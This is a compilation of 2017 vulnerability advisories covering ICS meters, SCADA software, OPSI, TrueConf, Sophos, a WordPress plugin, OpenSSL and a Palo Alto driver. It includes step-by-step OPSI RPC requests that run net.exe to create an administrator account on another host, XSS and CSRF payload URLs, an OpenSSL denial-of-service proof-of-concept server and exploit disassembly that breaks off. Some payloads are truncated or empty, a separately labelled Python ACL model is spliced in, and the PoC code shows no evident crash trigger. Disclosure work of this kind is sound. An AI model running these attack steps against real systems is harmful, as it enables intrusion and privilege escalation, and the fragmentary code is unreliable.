VMware Releases Security Updates

Original release date: January 31, 2017

VMware has released security updates to address vulnerabilities in Airwatch Agent, Airwatch Console, and AirWatch Inbox software. Exploitation of one of these vulnerabilities could allow a remote attacker to take control of an affected system.

Users and administrators are encouraged to review VMware Security Advisory VMSA-2017-0001 and apply the necessary updates.



BINOM3 Electric Power Quality Meter

CVSS v3 10

ATTENTION: Remotely exploitable/low skill level to exploit

Vendor: BINOM3

Equipment: Electric Power Quality Meter

Vulnerabilities: Cross-site scripting, access control issues, cross-site request forgery (CSRF), sensitive information stored in clear-text, and weak credentials management.

AFFECTED PRODUCTS

The following BINOM3 power meters are affected:

  • Universal multifunctional electric power quality meter.

IMPACT

Successful exploitation of these vulnerabilities could cause the device to inaccurately report a range of electrical quality measurements.

MITIGATION

BINOM3 has not created mitigations for these vulnerabilities.

NCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

ICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available in the ICS-CERT Technical Information Paper ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies, which is available for download from the ICS-CERT web site.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.

In addition, ICS-CERT recommends that users take the following measures to protect themselves from social engineering attacks:

  1. Do not click web links or open unsolicited attachments in email messages.
  2. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
  3. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploits specifically target these vulnerabilities.

VULNERABILITY OVERVIEW

Input sent from a malicious client is not properly verified by the server. An attacker can execute arbitrary script code in another user’s browser session.

CVE-2017-5164 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:H).

Lack of authentication for the remote service gives access to application setup and configuration.

CVE-2017-5162 has been assigned to this vulnerability. A CVSS v3 base score of 10 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).

No CSRF token is generated per page or per (sensitive) function. Successful exploitation of this vulnerability can allow silent execution of unauthorized actions on the device, such as configuration parameter changes and saving the modified configuration.

CVE-2017-5165 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:H).

This flaw can be used to gain privileged access to the device.

CVE-2017-5166 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Users do not have any option to change their own passwords.

CVE-2017-5167 has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L).

RESEARCHER

Karn Ganeshen reported these vulnerabilities.

BACKGROUND

Critical Infrastructure Sector(s): Energy

Countries Deployed: Russia

Company Headquarters Location: St Petersburg, Russia

Ecava IntegraXor

CVSS v3 7.3

ATTENTION: Remotely Exploitable/low skill level to exploit

Vendor: Ecava

Equipment: IntegraXor

Vulnerability: SQL Injection

AFFECTED PRODUCTS

The following IntegraXor version is affected:

  • IntegraXor Version 5.0.413.0

IMPACT

A successful exploit of this vulnerability could lead to arbitrary data leakage, data manipulation, and remote code execution.

MITIGATION

Ecava provides software update V5.2.722.2 for IntegraXor, which fixes this vulnerability, and recommends that users update to the new version. The update can be found here:

https://www.integraxor.com/download-scada/

NCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

ICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available in the ICS-CERT Technical Information Paper ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies, which is available for download from the ICS-CERT web site.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.

No known public exploits specifically target this vulnerability.

VULNERABILITY OVERVIEW

The Ecava IntegraXor web server has parameters that are vulnerable to SQL injection. If the queries are not sanitized, the host’s database could be subject to read, write, and delete commands.

CVE-2016-8341 has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L).

RESEARCHER

Independent researchers Brian Gorenc and Juan Pablo Lopez working with Trend Micro’s Zero Day Initiative have identified the SQL injection vulnerability.

BACKGROUND

Critical Infrastructure Sector(s): Critical Manufacturing, Energy, Water and Wastewater Systems, Transportation Systems

Countries Deployed: United Kingdom, United States, Australia, Poland, Canada, Estonia

Company Headquarters Location: Malaysia

OPSI Managed Client Remote Command Execution

Affected Products
Tested with:
OPSI Server 4.0.7.26
OPSI ClientAgent 4.0.7.10-1
(older releases have not been tested)
According to the vendor, all server instances that use a python-opsi version lower than 4.0.7.28-4 are affected.

References
https://www.secuvera.de/advisories/secuvera-SA-2017-01.txt (used for updates)
https://sourceforge.net/p/opsi/mailman/message/35609086/ (announcement by vendor, in German)
No CVE number has been assigned yet.

Summary:
“opsi is an open source client management system for Windows and Linux clients and is based on Linux servers” (http://uib.de/en/opsi/about-opsi/)
The default access control list (ACL) configuration of the OPSI server shipped with the product prior to version 4.0.7.28-4 is unsafe, so environments using this liberal ACL are vulnerable to remote command execution and, as a result, to privilege escalation.

Effect:
A remote attacker with knowledge of a single machine name and the corresponding OPSI machine key is able to execute arbitrary commands on any OPSI-managed client in the same managed environment by using the Remote Procedure Call (RPC) interface of the OPSI server.
The attacker is able to use the SYSTEM privileges of the OPSI agent on any managed client computer and execute arbitrary commands, leading to an elevation of privileges.

Example:
In this example scenario the attacker has, or has gained, local administrative rights on one client computer managed by the OPSI-Client-Agent (e.g. a developer who needs local administrative rights on his machine).
The OPSI Server opsiconfd has the options “verify ip” set to “yes” and “update ip” set to “no”. In the course of testing we figured out that these settings have no effect at all.
With the following steps he is able to gain administrative control over any other PC that is managed by the same OPSI Server instance.

1) Get the own machine name and the corresponding machine key:
Open
%programfiles(x86)%\opsi.org\opsi-client-agent\opsiclientd\opsiclientd.conf
and extract the values for the following parameters: host_id, opsi_host_key, url (of the config service)

In this scenario the host_id is pc1.test-network.lan.

2) Issue the following HTTP request to get a list of machines managed by OPSI:
POST /rpc HTTP/1.1
Host: :4447
Content-Length: 136
Accept-Encoding: deflate, gzip
Accept: application/json, text/plain
content-type: application/json
Authorization: Basic <"host_id:opsi_host_key" coded in base64>
Connection: close

{"params": ["*", "", "", "", "", "", "", "", ""], "id": 2, "method": "getClientIds_list", "Hostname": "*"}

The server responds with a list of managed systems, e.g.:
HTTP/1.1 200 OK
Content-Length: 1227
Set-Cookie: OPSISID=; path=/
Accept-Ranges: bytes
Server: Twisted/16.0.0 TwistedWeb/[OPSI.web2, version 0.2.0]
Date:
Content-Type: gzip-application/json;charset=utf-8
Connection: close

{"id": 2, "result": ["pc1.test-network.lan", "pc2.test-network.lan", "domaincontroller.test-network.lan"], "error": null}

3) Pick a PC that is not the machine originating this request. In this example we will use “domaincontroller.test-network.lan”.

4) Issue a request that adds a new user account “JohnConnor” with the password “R3sitanceIs4live”:
POST /rpc HTTP/1.1
Host: :4447
Content-Length: 136
Accept-Encoding: deflate, gzip
Accept: application/json, text/plain
content-type: application/json
Authorization: Basic <"host_id:opsi_host_key" coded in base64>
Connection: close

{"params": ["C:\\Windows\\System32\\net.exe user /add JohnConnor R3sitanceIs4live", "domaincontroller.test-network.lan"], "id": 2, "method": "hostControlSafe_execute"}

5) Move the newly created user to the local administrative group:
POST /rpc HTTP/1.1
Host: :4447
Content-Length: 136
Accept-Encoding: deflate, gzip
Accept: application/json, text/plain
content-type: application/json
Authorization: Basic <"host_id:opsi_host_key" coded in base64>
Connection: close

{"params": ["C:\\Windows\\System32\\net.exe localgroup Administrators JohnConnor /add", "domaincontroller.test-network.lan"], "id": 2, "method": "hostControlSafe_execute"}

6) Log in to domaincontroller.test-network.lan via RDP or, if you like, repeat steps 4 and 5 for every managed client to gain access to them.

Solution:
Update the OPSI Server to version 4.0.7.28-4 or higher. Use the supplied default acl.conf.
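As an added example that is not part of the advisory and not opsi's code, the following models method-level ACL enforcement for a JSON-RPC config service of the kind described above. Only the host names and method names come from the advisory; the rule syntax, host keys and admin account are hypothetical. The liberal rule set reproduces the described pre-4.0.7.28-4 behaviour, where any host that authenticates with its own machine key may call hostControlSafe_execute against any other host; the strict rule set limits such calls to administrators or to the caller itself.

```python
"""Illustrative method-level ACL for a JSON-RPC config service (hypothetical)."""
import base64
import hmac
import json
import re

# Constructed credential store: host_id -> opsi_host_key (values invented).
HOST_KEYS = {
    "pc1.test-network.lan": "5d41402abc4b2a76b9719d911017c592",
    "pc2.test-network.lan": "7d793037a0760186574b0282f2f435e7",
    "domaincontroller.test-network.lan": "c4ca4238a0b923820dcc509a6f75849b",
}
ADMIN_USERS = {"admin": "example-admin-secret"}  # hypothetical admin login

# ACL rule: (method regex, allowed principals). The first matching rule decides.
#   "admin"        an administrative user
#   "client"       any authenticated managed host, whatever the call targets
#   "client:self"  a managed host, but only for calls that target itself
LIBERAL_ACL = [(r".*", {"admin", "client"})]
STRICT_ACL = [
    (r"hostControl.*", {"admin", "client:self"}),
    (r"getClientIds_list", {"admin"}),
    (r".*", {"admin", "client:self"}),
]


def make_auth_header(name, secret):
    """Build the Basic header the same way the advisory's requests do."""
    token = base64.b64encode(f"{name}:{secret}".encode()).decode()
    return {"Authorization": f"Basic {token}"}


def authenticate(headers):
    """Return ("admin"|"client", name) for valid credentials, else None."""
    value = headers.get("Authorization", "")
    if not value.startswith("Basic "):
        return None
    try:
        name, _, secret = base64.b64decode(value[6:]).decode().partition(":")
    except (ValueError, UnicodeDecodeError):
        return None
    if name in ADMIN_USERS and hmac.compare_digest(secret, ADMIN_USERS[name]):
        return ("admin", name)
    if name in HOST_KEYS and hmac.compare_digest(secret, HOST_KEYS[name]):
        return ("client", name)
    return None


def targets_of(method, params):
    """Hosts a call acts on; hostControl* methods carry them in params[1]
    (one host id or a list), as in the advisory's requests."""
    if method.startswith("hostControl") and len(params) > 1:
        t = params[1]
        return set(t) if isinstance(t, list) else {t}
    return set()


def authorize(acl, principal, method, params):
    ptype, name = principal
    for pattern, allowed in acl:
        if not re.fullmatch(pattern, method):
            continue
        if ptype in allowed:
            return True
        if ptype == "client" and "client:self" in allowed:
            # Every target must be the caller itself (a call with no targets is fine).
            return targets_of(method, params) <= {name}
        return False
    return False  # no rule matched: deny by default


def handle_rpc(acl, headers, body):
    """Authenticate, authorize, and return a JSON-RPC style response dict."""
    req = json.loads(body)
    principal = authenticate(headers)
    if principal is None:
        return {"id": req.get("id"), "result": None, "error": "authentication failed"}
    method, params = req["method"], req.get("params", [])
    if not authorize(acl, principal, method, params):
        return {"id": req.get("id"), "result": None,
                "error": f"{principal[1]} is not allowed to call {method}"}
    # A real server would dispatch here; this model only reports what would run.
    return {"id": req.get("id"), "result": f"dispatched {method}", "error": None}


def rpc_error(acl, name, secret, method, params, req_id=2):
    """Perform one call as the given principal and return its error (None if allowed)."""
    body = json.dumps({"id": req_id, "method": method, "params": params})
    return handle_rpc(acl, make_auth_header(name, secret), body)["error"]


if __name__ == "__main__":
    pc1 = "pc1.test-network.lan"
    call = ("hostControlSafe_execute", ["ipconfig", "domaincontroller.test-network.lan"])
    print("liberal ACL:", rpc_error(LIBERAL_ACL, pc1, HOST_KEYS[pc1], *call))
    print("strict ACL: ", rpc_error(STRICT_ACL, pc1, HOST_KEYS[pc1], *call))
```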

Disclosure Timeline:
2017/01/09 problem was found during a penetration test
2017/01/09 vendor contacted via email to [email protected] and [email protected]
2017/01/10 initial vendor response from [email protected] submitting responsible contact details
2017/01/10 submitted advisory to responsible contact
2017/01/10 vendor acknowledged problem and sent a fix. Proposed updating access control lists shipped with product
2017/01/10 supplied fix was verified solving the problem
2017/01/12 vendor supplied a more strict version of the fix and details about how and when they inform their users
2017/01/13 vendor supplied a fix for “verify ip” issue
2017/01/17 vendor publicly announced the fix for ACL and verify ip setting
2017/01/30 advisory disclosure

Credits
Simon Bieber, secuvera GmbH
[email protected]
https://www.secuvera.de

Thanks to:
Tobias Glemser & Sven Supper, secuvera GmbH
and
Niko Wenselowski, uib GmbH
for their support.

Disclaimer:
All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage. Therefore secuvera shall not be liable for any direct or indirect damages that might be caused by using this information.

TrueConf Server 4.3.7 Cross Site Scripting / Open Redirect / CSRF

TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities

Vendor: TrueConf LLC
Product web page: https://www.trueconf.com
Affected version: 4.3.7.12255 and 4.3.7.12219

Summary: TrueConf Server is a powerful, high-quality and highly secured
video conferencing software server. It is specially designed to work with
up to 250 participants in a multipoint conference over LAN or VPN networks.
TrueConf Server requires no hardware and includes client applications for
all popular platforms, making it an easy-to-set up, unified communications
solution.

Desc: The administration interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Input passed via the ‘redirect_url’ GET parameter is not properly verified before
being used to redirect users. This can be exploited to redirect a user to an
arbitrary website e.g. when a user clicks a specially crafted link to the affected
script hosted on a trusted domain.

TrueConf also suffers from multiple stored, reflected and DOM XSS issues when
input passed via several parameters to several scripts is not properly sanitized
before being returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user’s browser session in context of an affected site.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
Apache/2.4.17 (Win32)
PHP/5.4.41

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
@zeroscience

Advisory ID: ZSL-2017-5393
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5393.php

01.11.2016

CSRF Stored XSS:
—————-

Reflected XSS:
————–

http://127.0.0.1:8888/admin/conferences/get-all-status/?keys[]=
http://127.0.0.1:8888/admin/conferences/list/?sort=status%26'%22()%26%25

prompt(251)
http://127.0.0.1:8888/admin/group/list/?checked_group_id=0001&sort=name
http://127.0.0.1:8888/admin/group/list/?checked_group_id=' onmouseover=confirm(251) ?

DOM XSS:
——–

http://127.0.0.1:8888/admin/group?'\>
http://127.0.0.1:8888/admin/conferences/list/?domxss=javascript:domxssExecutionSink(1,"'\">

Open Redirect:
————–

Request:

GET /admin/general/change-lang?lang_on=en&redirect_url=http://www.zeroscience.mk HTTP/1.1
Host: 127.0.0.1:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Response:

HTTP/1.1 302 Found
Date: Thu, 22 Sep 2016 21:15:40 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.zeroscience.mk
Content-Length: 0
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

CSRF Stop Web Service:
———————-


Sophos Web Appliance 4.2.1.3 Remote Command Injection

Critical Start security expert Russell Sanford discovered and reported two critical zero-day vulnerabilities in the Sophos Web Appliance in December of 2016. The vulnerabilities, documented under CVE-2016-9553, allow the remote compromise of the appliance’s underlying Linux subsystem. The vulnerabilities have now been patched in the January 2017 4.3.1 release of the appliance line.

Here is a summary of the two vulnerabilities documented under CVE-2016-9553.

CVE ID
CVE-2016-9553
Vulnerability Details
The Sophos Web Appliance (version 4.2.1.3) is vulnerable to two remote command injection vulnerabilities affecting its web administrative interface. These vulnerabilities occur in the MgrReport.php (/controllers/MgrReport.php) component responsible for blocking and unblocking IP addresses that are able to access the appliance.
The device doesn’t properly escape the information passed in the variables ‘unblockip’ and ‘blockip’ before calling the shell_exec() function, which allows system commands to be injected into the device.
The page that contains the vulnerabilities, /controllers/MgrReport.php, is accessed by a number of the machine’s built-in commands in the administrative interface. The pages that call the vulnerable page (passed in the ‘&c=’ parameter) are: ‘report’, ‘trend_volume’, ‘trend_suspect’, ‘top_app_ctrl’, ‘perf_latency’, ‘perf_throughput’, ‘users_browse_summary’, ‘traf_sites’, ‘traf_blocked’, ‘traf_users’, ‘users_virus_downloaders’, ‘users_pua_downloaders’, ‘users_highrisk’, ‘users_policy_violators’, ‘users_top_users_by_browse_time’, ‘users_quota’, ‘users_browse_time_by_user’, ‘users_top_users_by_category’, ‘users_site_visits_by_user’, ‘users_category_visits_by_user’, ‘users_monitored_search_queries’, ‘users_app_ctrl’, ‘traf_category’, ‘traf_download’, and ‘warned_sites’.
Exploitation of this vulnerability yields shell access to the remote machine under the system account ‘spiderman’.
Vendor Response
Sophos has issued an update to correct this vulnerability. More details can be found at:

http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.1.html

Credit
This vulnerability was discovered by Russell Sanford of Critical Start.
CVSS Score
CVSS Base Score: 8.5

CVSS v2 Vector: (AV:N/AC:M/Au:S/C:C/I:C/A:C/E:F/RL:OF/RC:C/CDP:ND/TD:ND/CR:H/IR:H/AR:ND)

Affected Vendors
Sophos

Affected Products
Web Appliance before version 4.3.1.3

Disclosure Timeline
2016-11-12 – Vulnerability discovered in audit
2016-11-13 – POC exploit created
2016-11-19 – Contacted MITRE for CVE
2016-11-22 – CVE-2016-9553 assigned
2016-11-29 – Sophos Contacted through Bugcrowd to coordinate fix
2017-01-20 – Sophos patched bug in Version 4.3.1 (Work Order# NSWA-1258)
2017-01-20 – Coordinated public release of advisory
2017-01-28 – CVE-2016-9553 publicly released.

About Critical Start
Critical Start is an employee owned cybersecurity company with the goal to improve the security capability of our clients using a strategy based methodology known as the Defendable Network. We provide security consulting services, PCI QSA services, product fulfillment, and Managed Security Services.

To schedule an appointment to discuss a cybersecurity assessment or penetration test with our team members, please call 214-810-6760 or email [email protected].

WordPress User Access Manager 1.2.6.7 Cross Site Scripting

————————————————————————
Persistent Cross-Site Scripting vulnerability in User Access Manager
WordPress Plugin
————————————————————————
Burak Kelebek, July 2016

————————————————————————
Abstract
————————————————————————
A persistent Cross-Site Scripting vulnerability has been encountered in
the User Access Manager WordPress Plugin. This issue allows an attacker
to perform a wide variety of actions, such as stealing Administrators’
session tokens, or performing arbitrary actions on their behalf. In
order to exploit this issue, the attacker has to lure/force a logged on
WordPress Administrator into opening a malicious website.

————————————————————————
OVE ID
————————————————————————
OVE-20160712-0025

————————————————————————
Tested versions
————————————————————————
This issue was successfully tested on the User Access Manager WordPress
Plugin version 1.2.6.7.

————————————————————————
Fix
————————————————————————
This issue is resolved in User Access Manager version 1.2.14.

————————————————————————
Details
————————————————————————
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_user_access_manager_wordpress_plugin.html

Persistent Cross-Site Scripting was found in the admin panel ‘manage’ page of User Access Manager. Multiple parameters of the uam_usergroup POST request are affected due to insufficient output encoding. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators’ session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

Proof of concept


————————————————————————
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

OpenSSL 1.1.0 Remote Client Denial Of Service

// Source: https://guidovranken.wordpress.com/2017/01/26/cve-2017-3730-openssl-1-1-0-remote-client-denial-of-service-affects-servers-as-well-poc/

/*
 * SSL server demonstration program
 *
 * Copyright (C) 2006-2015, ARM Limited, All Rights Reserved
 * SPDX-License-Identifier: Apache-2.0
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may
 * not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 *
 * This file is part of mbed TLS (https://tls.mbed.org)
 */

/* Taken from mbed TLS programs/ssl/ssl_server.c and modified to crash postfix.
 * Belongs to https://github.com/guidovranken/CVE-2017-3730
 */
#include <stdio.h>
#include <string.h>

#include "mbedtls/entropy.h"
#include "mbedtls/ctr_drbg.h"
#include "mbedtls/certs.h"
#include "mbedtls/x509.h"
#include "mbedtls/ssl.h"
#include "mbedtls/net_sockets.h"
#include "mbedtls/error.h"
#include "mbedtls/debug.h"

/* Send the NUL-terminated string in buf, then overwrite buf with the
 * client's reply. Returns the number of bytes received, or -1 on send error. */
static int write_and_get_response( mbedtls_net_context *sock_fd, char *buf, size_t len )
{
    int ret;

    if( ( ret = mbedtls_net_send( sock_fd, (unsigned char*)buf, strlen( buf ) ) ) <= 0 )
    {
        return -1;
    }

    memset( buf, 0, len );
    ret = mbedtls_net_recv( sock_fd, (unsigned char*)buf, len );
    return ret;
}

int main( void )
{
    int ret;
    mbedtls_net_context listen_fd, client_fd;
    char buf[1024];
    const char *pers = "ssl_server";

    int force_ciphersuite[2];
    mbedtls_entropy_context entropy;
    mbedtls_ctr_drbg_context ctr_drbg;
    mbedtls_ssl_context ssl;
    mbedtls_ssl_config conf;
    mbedtls_x509_crt srvcert;
    mbedtls_pk_context pkey;

    mbedtls_net_init( &listen_fd );
    mbedtls_net_init( &client_fd );
    mbedtls_ssl_init( &ssl );
    mbedtls_ssl_config_init( &conf );
    mbedtls_x509_crt_init( &srvcert );
    mbedtls_pk_init( &pkey );
    mbedtls_entropy_init( &entropy );
    mbedtls_ctr_drbg_init( &ctr_drbg );

    /* Use the test certificate and key that ship with mbed TLS */
    ret = mbedtls_x509_crt_parse( &srvcert, (const unsigned char *) mbedtls_test_srv_crt,
                                  mbedtls_test_srv_crt_len );
    if( ret != 0 )
    {
        goto exit;
    }

    ret = mbedtls_x509_crt_parse( &srvcert, (const unsigned char *) mbedtls_test_cas_pem,
                                  mbedtls_test_cas_pem_len );
    if( ret != 0 )
    {
        goto exit;
    }

    ret = mbedtls_pk_parse_key( &pkey, (const unsigned char *) mbedtls_test_srv_key,
                                mbedtls_test_srv_key_len, NULL, 0 );
    if( ret != 0 )
    {
        goto exit;
    }

    if( ( ret = mbedtls_net_bind( &listen_fd, NULL, "8888", MBEDTLS_NET_PROTO_TCP ) ) != 0 )
    {
        goto exit;
    }

    if( ( ret = mbedtls_ctr_drbg_seed( &ctr_drbg, mbedtls_entropy_func, &entropy,
                                       (const unsigned char *) pers,
                                       strlen( pers ) ) ) != 0 )
    {
        goto exit;
    }

    if( ( ret = mbedtls_ssl_config_defaults( &conf,
                                             MBEDTLS_SSL_IS_SERVER,
                                             MBEDTLS_SSL_TRANSPORT_STREAM,
                                             MBEDTLS_SSL_PRESET_DEFAULT ) ) != 0 )
    {
        goto exit;
    }

    mbedtls_ssl_conf_rng( &conf, mbedtls_ctr_drbg_random, &ctr_drbg );

    mbedtls_ssl_conf_ca_chain( &conf, srvcert.next, NULL );
    if( ( ret = mbedtls_ssl_conf_own_cert( &conf, &srvcert, &pkey ) ) != 0 )
    {
        goto exit;
    }

    /* Force a DHE suite so the server sends DH parameters in the handshake */
    force_ciphersuite[0] = mbedtls_ssl_get_ciphersuite_id( "TLS-DHE-RSA-WITH-AES-256-GCM-SHA384" );
    force_ciphersuite[1] = 0;
    mbedtls_ssl_conf_ciphersuites( &conf, force_ciphersuite );

    if( ( ret = mbedtls_ssl_setup( &ssl, &conf ) ) != 0 )
    {
        goto exit;
    }

reset:

    mbedtls_net_free( &client_fd );

    mbedtls_ssl_session_reset( &ssl );

    if( ( ret = mbedtls_net_accept( &listen_fd, &client_fd,
                                    NULL, 0, NULL ) ) != 0 )
    {
        goto exit;
    }

    /* Minimal SMTP dialogue: greet, answer EHLO, wait for STARTTLS */
    sprintf( buf, "220 ok\n" );
    ret = write_and_get_response( &client_fd, buf, sizeof( buf ) );

    if( ret < 5 )
    {
        goto exit;
    }

    if( strncmp( buf, "EHLO ", 5 ) != 0 )
    {
        goto exit;
    }

    sprintf( buf, "250-SIZE 157286400\n250-8BITMIME\n250-STARTTLS\n250-ENHANCEDSTATUSCODES\n250-PIPELINING\n250-CHUNKING\n250 SMTPUTF8\n" );
    ret = write_and_get_response( &client_fd, buf, sizeof( buf ) );

    if( ret < 8 )
    {
        goto exit;
    }

    if( strncmp( buf, "STARTTLS", 8 ) != 0 )
    {
        goto exit;
    }
    sprintf( buf, "220 ok\n" );
    ret = mbedtls_net_send( &client_fd, (unsigned char*)buf, strlen( buf ) );
    if( ret < 0 )
    {
        goto exit;
    }

    mbedtls_ssl_set_bio( &ssl, &client_fd, mbedtls_net_send, mbedtls_net_recv, NULL );

    while( ( ret = mbedtls_ssl_handshake( &ssl ) ) != 0 )
    {
        if( ret != MBEDTLS_ERR_SSL_WANT_READ && ret != MBEDTLS_ERR_SSL_WANT_WRITE )
        {
            goto reset;
        }
    }

    while( ( ret = mbedtls_ssl_close_notify( &ssl ) ) < 0 )
    {
        if( ret != MBEDTLS_ERR_SSL_WANT_READ &&
            ret != MBEDTLS_ERR_SSL_WANT_WRITE )
        {
            goto reset;
        }
    }

    ret = 0;
    goto reset;

exit:

    mbedtls_net_free( &client_fd );
    mbedtls_net_free( &listen_fd );

    mbedtls_x509_crt_free( &srvcert );
    mbedtls_pk_free( &pkey );
    mbedtls_ssl_free( &ssl );
    mbedtls_ssl_config_free( &conf );
    mbedtls_ctr_drbg_free( &ctr_drbg );
    mbedtls_entropy_free( &entropy );

    return( ret );
}

Palo Alto Networks Terminal Services Agent 7.0.3-13 Integer Overflow

/*

Exploit Title – Palo Alto Networks Terminal Services Agent Integer Overflow
Date – 26th January 2017
Discovered by – Parvez Anwar (@parvezghh)
Vendor Homepage – https://www.paloaltonetworks.com/
Tested Version – 7.0.3-13
Driver Version – 6.0.7.0 – panta.sys
Tested on OS – 32bit Windows 7 SP1
CVE ID – CVE-2017-5329
Vendor fix url – https://securityadvisories.paloaltonetworks.com/
https://securityadvisories.paloaltonetworks.com/Home/Detail/71
Fixed Version – 7.0.7 and later
Fixed driver ver – 6.0.8.0

Disassembly
———–

.text:9A26F0BD loc_9A26F0BD:
.text:9A26F0BD mov ecx, DeviceObject
.text:9A26F0C3 mov dword ptr [ecx+1ACh], 0
.text:9A26F0CD mov edx, DeviceObject
.text:9A26F0D3 mov eax, [edx+1B8h] ; eax points to our inputted buffer
.text:9A26F0D9 mov ecx, [eax+14h] ; Takes size to allocate from our inputted buffer 0x04924925
.text:9A26F0DC imul ecx, 38h ; 0x38 * 0x04924925 = 0x100000018. Wraps round becoming size to allocate 0x18 (Integer Overflow)
.text:9A26F0DF mov [ebp+NumberOfBytes], ecx ; Copy ecx value 0x18 onto stack
.text:9A26F0E2 push 44415450h ; Tag (PTAD string used)
.text:9A26F0E7 mov edx, [ebp+NumberOfBytes] ; Copy size 0x18 to edx
.text:9A26F0EA push edx ; NumberOfBytes
.text:9A26F0EB push 0 ; PoolType
.text:9A26F0ED call ds:ExAllocatePoolWithTag ; If returned null (eax) exits with error cleanly else takes crash path
.text:9A26F0F3 mov ecx, DeviceObject
.text:9A26F0F9 mov [ecx+1B0h], eax
.text:9A26F0FF mov edx, DeviceObject
.text:9A26F105 cmp dword ptr [edx+1B0h], 0 ; Checks return value. If not null then jumps to our crash path
.text:9A26F10C jnz short loc_9A26F13C ; Exits with error cleanly if incorrect size value but not crashable value

.text:9A26F13C
.text:9A26F13C loc_9A26F13C:
.text:9A26F13C mov ecx, [ebp+NumberOfBytes]
.text:9A26F13F push ecx ; 0x18 our allocated pool memory
.text:9A26F140 push 0 ; int, sets allocated memory to 0x00
.text:9A26F142 mov edx, DeviceObject
.text:9A26F148 mov eax, [edx+1B0h]
.text:9A26F14E push eax ; Pointer to our allocated buffer
.text:9A26F14F call memset
.text:9A26F154 add esp, 0Ch
.text:9A26F157 mov [ebp+var_4], 0 ; Null out ebp-4
.text:9A26F15E jmp short loc_9A26F169

.text:9A26F160 loc_9A26F160:
.text:9A26F160 mov ecx, [ebp+var_4]
.text:9A26F163 add ecx, 1 ; Increment counter
.text:9A26F166 mov [ebp+var_4], ecx ; Store counter value

.text:9A26F169 loc_9A26F169:
.text:9A26F169 mov edx, DeviceObject
.text:9A26F16F mov eax, [edx+1B8h] ; eax points to our inputted buffer
.text:9A26F175 mov ecx, [ebp+var_4] ; Loop counter number
.text:9A26F178 cmp ecx, [eax+14h] ; Compares our inputted buffer size 0x04924925. Here our
; size is not using the wrapped value so loops till BSOD
